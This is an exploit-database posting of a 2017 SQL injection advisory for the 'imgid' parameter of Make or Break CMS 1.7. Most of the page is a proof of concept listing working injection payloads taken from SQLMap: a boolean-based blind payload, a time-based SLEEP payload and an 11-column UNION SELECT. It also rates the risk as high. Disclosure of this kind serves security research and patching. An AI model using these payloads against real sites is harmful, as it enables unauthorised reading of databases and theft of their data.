Impacted by this exploit? Fix it here

JOB OFFER: Exploit Analyst (m/f)

Edit Report

Make Or Break 1.7 SQL Injection# Exploit   : Make or Break 1.7 (imgid) SQL Injection Vulnerability
# Author    : v3n0m
# Contact   : v3n0m[at]outlook[dot]com
# Date      : January, 09-2017 GMT +7:00 Jakarta, Indonesia
# Software  : Make or Break
# Version   : 1.7 Lower versions may also be affected
# License   : Free
# Download  :
# Credits   : YOGYACARDERLINK, Dhea Fathin Karima & YOU !!
1. Description
An attacker can exploit this vulnerability to read from the database.
The parameter 'imgid' is vulnerable.
2. Proof of Concept
# Exploitation via SQLMap
Parameter: imgid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: imgid=1 AND 4688=4688
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: imgid=1 OR SLEEP(2)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
3. Security Risk
The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.


Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.